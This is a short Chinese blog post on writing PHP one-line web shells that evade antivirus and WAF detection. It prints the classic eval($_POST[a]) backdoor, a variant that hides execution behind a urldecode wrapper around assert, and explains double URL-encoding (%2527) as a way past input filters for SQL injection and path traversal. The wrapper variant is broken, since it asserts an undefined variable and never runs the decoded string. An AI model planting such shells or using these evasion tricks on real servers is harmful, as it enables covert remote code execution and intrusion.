PHP语言编写一句话木马过杀毒软件的技巧解说-一般一句话木马的...

七彩网络

昔年博客
首页>> Web安全 >>PHP语言编写一句话木马过杀毒软件的技巧解说

一般一句话木马的写法


<?php eval(@$_POST[a]);?>
存在WAF的话,这种都直接杀的。
其实我们可以稍微变形一下
<?php 
function aa($str){
$cmd = urldecode($str);//可以随便解码
assert($a);
}

aa($_POST[a]);//执行代码

 ?>

上面这种,一般也会被杀,因为基于特征,还是直接用assert去执行代码。
这种在一次CTF中用到过,那次是过滤了../和./
我们使用解码可以绕过

这里我用注入的一种绕过手段来解释
比如,我们要传入index?id=%27,也就是单引号'
我们要手工改成%2527
经过urldecode,就变成了‘,因为%25 解码后等于 %
有些老哥可能要提问了
%2527解码后就变成%27
那么$sql = "SELECT id,user from t_user where id = '{$id}'";
是不是拼接成SELECT id,user from t_user where id = '%27'

其实不是这样的。我们%2527经过浏览器的时候,会自动urldecode一次
其实传到我们代码里的是%27
%27再经过我们urldecode,也就变成了一个'

这种绕过方式,在WAF里可以这么用下。



×

感谢您的支持,我们会一直保持!

扫码支持
请土豪扫码随意打赏

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

打赏作者
版权所有,转载注意明处:昔年博客 » PHP语言编写一句话木马过杀毒软件的技巧解说
分享本文至:
点击评论 您阅读这篇文章共花了: 

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)